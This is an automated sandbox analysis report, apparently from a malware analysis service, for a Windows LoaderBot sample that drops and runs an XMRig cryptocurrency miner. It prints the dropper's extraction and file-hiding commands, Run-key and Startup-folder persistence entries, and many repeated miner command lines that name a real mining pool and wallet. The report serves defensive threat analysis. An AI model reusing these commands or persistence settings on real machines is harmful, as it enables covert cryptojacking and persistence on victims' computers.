loaderbot | 7cecd6d2b7a8c9a835d73e404a1659afeb39e92a59fe19e57c8ab265c9f77c72

Analysis

max time kernel
150s
max time network
124s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
09-08-2023 06:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f810de3ef202723a9fa3637e69115da6.exe
Size

4.2MB
MD5

f810de3ef202723a9fa3637e69115da6
SHA1

06ac4717e846873a31944aa6d05ba3cc317605f3
SHA256

7cecd6d2b7a8c9a835d73e404a1659afeb39e92a59fe19e57c8ab265c9f77c72
SHA512

ab4a05276d9c34799b3138efbfb85b8a5d0dfa1e642a797e2dca08efc0c2cedbb70d94f1ab2cf70f0702a6c1cf0510516c944642b1b7654457043875714edb53
SSDEEP

98304:EJ5C38lbZzsxc/QxovXoI1rt91KnH+rV8hliQTqvtqf+XIjagOc:EJjbdoc/QxGv1bsnerVCle8SIjROc

Score

10^/10

loaderbot xmrig loader miner persistence

Malware Config

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

LoaderBot executable 4 IoCs

resource	yara_rule
behavioral1/files/0x0006000000016ca2-138.dat	loaderbot
behavioral1/files/0x0006000000016ca2-140.dat	loaderbot
behavioral1/memory/2764-142-0x0000000000E00000-0x00000000011FE000-memory.dmp	loaderbot
behavioral1/memory/2764-150-0x0000000006310000-0x0000000006E85000-memory.dmp	loaderbot

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral1/memory/2068-153-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2068-152-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/668-159-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1112-165-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/3056-170-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2268-176-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2000-182-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1696-187-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2400-192-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2948-197-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1948-202-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2508-207-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/764-212-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2924-217-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2724-222-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2292-227-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1372-232-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2664-237-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1412-242-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2800-247-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1776-252-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1664-257-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2776-262-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2084-266-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1092-270-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/856-274-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2664-278-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1088-282-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/700-286-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2540-290-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2064-294-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2108-298-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/560-302-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2248-307-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1740-312-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2884-317-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2720-322-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1032-327-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1340-332-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1708-337-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2180-342-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2172-347-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2056-352-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2912-357-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2384-362-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/3056-367-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1672-372-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2256-377-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1628-382-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/816-387-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2128-392-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1484-397-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2356-402-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/764-407-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2368-412-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2776-417-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1740-422-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2396-427-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2076-440-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2864-445-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2788-450-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/744-455-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1104-460-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1772-465-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	Installer.exe

Executes dropped EXE 64 IoCs

pid	Process
2924	7z.exe
2900	7z.exe
2724	7z.exe
2800	7z.exe
1984	7z.exe
336	7z.exe
1500	7z.exe
2704	7z.exe
1304	7z.exe
2764	Installer.exe
2068	Driver.exe
668	Driver.exe
1112	Driver.exe
3056	Driver.exe
2268	conhost.exe
2000	Driver.exe
1696	Driver.exe
2400	Driver.exe
2948	Driver.exe
1948	Driver.exe
2508	Driver.exe
764	Driver.exe
2924	Driver.exe
2724	conhost.exe
2292	conhost.exe
1372	Driver.exe
2664	Driver.exe
1412	Driver.exe
2800	Driver.exe
1776	Driver.exe
1664	Driver.exe
2776	Driver.exe
2084	conhost.exe
1092	Driver.exe
856	Driver.exe
2664	Driver.exe
1088	Driver.exe
700	conhost.exe
2540	Driver.exe
2064	Driver.exe
2108	Driver.exe
560	Driver.exe
2248	Driver.exe
1740	Driver.exe
2884	Driver.exe
2720	Driver.exe
1032	Driver.exe
1340	Driver.exe
1708	Driver.exe
2180	Driver.exe
2172	Driver.exe
2056	Driver.exe
2912	Driver.exe
2384	Driver.exe
3056	Driver.exe
1672	Driver.exe
2256	Driver.exe
1628	Driver.exe
816	Driver.exe
2128	Driver.exe
1484	Driver.exe
2356	Driver.exe
764	conhost.exe
2368	Driver.exe

Loads dropped DLL 19 IoCs

pid	Process
2832	cmd.exe
2924	7z.exe
2832	cmd.exe
2900	7z.exe
2832	cmd.exe
2724	7z.exe
2832	cmd.exe
2800	7z.exe
2832	cmd.exe
1984	7z.exe
2832	cmd.exe
336	7z.exe
2832	cmd.exe
1500	7z.exe
2832	cmd.exe
2704	7z.exe
2832	cmd.exe
1304	7z.exe
2764	Installer.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4219371764-2579186923-3390623117-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\Installer.exe"	Installer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2764	Installer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe
2764	Installer.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2764	Installer.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeRestorePrivilege	2924	7z.exe
Token: 35	2924	7z.exe
Token: SeSecurityPrivilege	2924	7z.exe
Token: SeSecurityPrivilege	2924	7z.exe
Token: SeRestorePrivilege	2900	7z.exe
Token: 35	2900	7z.exe
Token: SeSecurityPrivilege	2900	7z.exe
Token: SeSecurityPrivilege	2900	7z.exe
Token: SeRestorePrivilege	2724	7z.exe
Token: 35	2724	7z.exe
Token: SeSecurityPrivilege	2724	7z.exe
Token: SeSecurityPrivilege	2724	7z.exe
Token: SeRestorePrivilege	2800	7z.exe
Token: 35	2800	7z.exe
Token: SeSecurityPrivilege	2800	7z.exe
Token: SeSecurityPrivilege	2800	7z.exe
Token: SeRestorePrivilege	1984	7z.exe
Token: 35	1984	7z.exe
Token: SeSecurityPrivilege	1984	7z.exe
Token: SeSecurityPrivilege	1984	7z.exe
Token: SeRestorePrivilege	336	7z.exe
Token: 35	336	7z.exe
Token: SeSecurityPrivilege	336	7z.exe
Token: SeSecurityPrivilege	336	7z.exe
Token: SeRestorePrivilege	1500	7z.exe
Token: 35	1500	7z.exe
Token: SeSecurityPrivilege	1500	7z.exe
Token: SeSecurityPrivilege	1500	7z.exe
Token: SeRestorePrivilege	2704	7z.exe
Token: 35	2704	7z.exe
Token: SeSecurityPrivilege	2704	7z.exe
Token: SeSecurityPrivilege	2704	7z.exe
Token: SeRestorePrivilege	1304	7z.exe
Token: 35	1304	7z.exe
Token: SeSecurityPrivilege	1304	7z.exe
Token: SeSecurityPrivilege	1304	7z.exe
Token: SeDebugPrivilege	2764	Installer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1912 wrote to memory of 2832	1912	f810de3ef202723a9fa3637e69115da6.exe	28
PID 1912 wrote to memory of 2832	1912	f810de3ef202723a9fa3637e69115da6.exe	28
PID 1912 wrote to memory of 2832	1912	f810de3ef202723a9fa3637e69115da6.exe	28
PID 1912 wrote to memory of 2832	1912	f810de3ef202723a9fa3637e69115da6.exe	28
PID 2832 wrote to memory of 2940	2832	cmd.exe	30
PID 2832 wrote to memory of 2940	2832	cmd.exe	30
PID 2832 wrote to memory of 2940	2832	cmd.exe	30
PID 2832 wrote to memory of 2924	2832	cmd.exe	31
PID 2832 wrote to memory of 2924	2832	cmd.exe	31
PID 2832 wrote to memory of 2924	2832	cmd.exe	31
PID 2832 wrote to memory of 2900	2832	cmd.exe	32
PID 2832 wrote to memory of 2900	2832	cmd.exe	32
PID 2832 wrote to memory of 2900	2832	cmd.exe	32
PID 2832 wrote to memory of 2724	2832	cmd.exe	33
PID 2832 wrote to memory of 2724	2832	cmd.exe	33
PID 2832 wrote to memory of 2724	2832	cmd.exe	33
PID 2832 wrote to memory of 2800	2832	cmd.exe	34
PID 2832 wrote to memory of 2800	2832	cmd.exe	34
PID 2832 wrote to memory of 2800	2832	cmd.exe	34
PID 2832 wrote to memory of 1984	2832	cmd.exe	35
PID 2832 wrote to memory of 1984	2832	cmd.exe	35
PID 2832 wrote to memory of 1984	2832	cmd.exe	35
PID 2832 wrote to memory of 336	2832	cmd.exe	36
PID 2832 wrote to memory of 336	2832	cmd.exe	36
PID 2832 wrote to memory of 336	2832	cmd.exe	36
PID 2832 wrote to memory of 1500	2832	cmd.exe	37
PID 2832 wrote to memory of 1500	2832	cmd.exe	37
PID 2832 wrote to memory of 1500	2832	cmd.exe	37
PID 2832 wrote to memory of 2704	2832	cmd.exe	38
PID 2832 wrote to memory of 2704	2832	cmd.exe	38
PID 2832 wrote to memory of 2704	2832	cmd.exe	38
PID 2832 wrote to memory of 1304	2832	cmd.exe	39
PID 2832 wrote to memory of 1304	2832	cmd.exe	39
PID 2832 wrote to memory of 1304	2832	cmd.exe	39
PID 2832 wrote to memory of 2484	2832	cmd.exe	40
PID 2832 wrote to memory of 2484	2832	cmd.exe	40
PID 2832 wrote to memory of 2484	2832	cmd.exe	40
PID 2832 wrote to memory of 2764	2832	cmd.exe	41
PID 2832 wrote to memory of 2764	2832	cmd.exe	41
PID 2832 wrote to memory of 2764	2832	cmd.exe	41
PID 2832 wrote to memory of 2764	2832	cmd.exe	41
PID 2832 wrote to memory of 2764	2832	cmd.exe	41
PID 2832 wrote to memory of 2764	2832	cmd.exe	41
PID 2832 wrote to memory of 2764	2832	cmd.exe	41
PID 2764 wrote to memory of 2068	2764	Installer.exe	43
PID 2764 wrote to memory of 2068	2764	Installer.exe	43
PID 2764 wrote to memory of 2068	2764	Installer.exe	43
PID 2764 wrote to memory of 2068	2764	Installer.exe	43
PID 2764 wrote to memory of 668	2764	Installer.exe	46
PID 2764 wrote to memory of 668	2764	Installer.exe	46
PID 2764 wrote to memory of 668	2764	Installer.exe	46
PID 2764 wrote to memory of 668	2764	Installer.exe	46
PID 2764 wrote to memory of 1112	2764	Installer.exe	47
PID 2764 wrote to memory of 1112	2764	Installer.exe	47
PID 2764 wrote to memory of 1112	2764	Installer.exe	47
PID 2764 wrote to memory of 1112	2764	Installer.exe	47
PID 2764 wrote to memory of 3056	2764	Installer.exe	134
PID 2764 wrote to memory of 3056	2764	Installer.exe	134
PID 2764 wrote to memory of 3056	2764	Installer.exe	134
PID 2764 wrote to memory of 3056	2764	Installer.exe	134
PID 2764 wrote to memory of 2268	2764	Installer.exe	133
PID 2764 wrote to memory of 2268	2764	Installer.exe	133
PID 2764 wrote to memory of 2268	2764	Installer.exe	133
PID 2764 wrote to memory of 2268	2764	Installer.exe	133

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2484	attrib.exe

C:\Users\Admin\AppData\Local\Temp\f810de3ef202723a9fa3637e69115da6.exe
"C:\Users\Admin\AppData\Local\Temp\f810de3ef202723a9fa3637e69115da6.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1912
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2832
- - C:\Windows\system32\mode.com
    mode 65,10
    3⤵
    PID:2940
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e file.zip -p249982930408270732568412498 -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:2924
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_8.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:2900
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_7.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:2724
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_6.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:2800
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_5.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:1984
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_4.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:336
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_3.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:1500
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_2.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:2704
- - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
    7z.exe e extracted/file_1.zip -oextracted
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of AdjustPrivilegeToken
    PID:1304
- - C:\Windows\system32\attrib.exe
    attrib +H "Installer.exe"
    3⤵
    - Views/modifies file attributes
    PID:2484
- - C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
    "Installer.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2764
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2068
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:668
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:1112
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:3056
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2268
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2000
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:1696
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2400
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2948
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:1948
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2508
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:764
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2924
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2724
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2292
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:1372
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2664
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:1412
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:2800
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:1776
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      Executes dropped EXE
      PID:1664
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o gulf.moneroocean.stream:10128 -u 44uDhHEfWHzXd48XF1cDiigsmJwe8oNwPbakeJ2vgpCYbVhKVSgihvSENUbzW65s7uUmR1kHKMnRA61b5wEo4c9ZSNQmqmr -p x -k -v=0 --donate-level=1 -t 4
      4⤵
      PID:2776
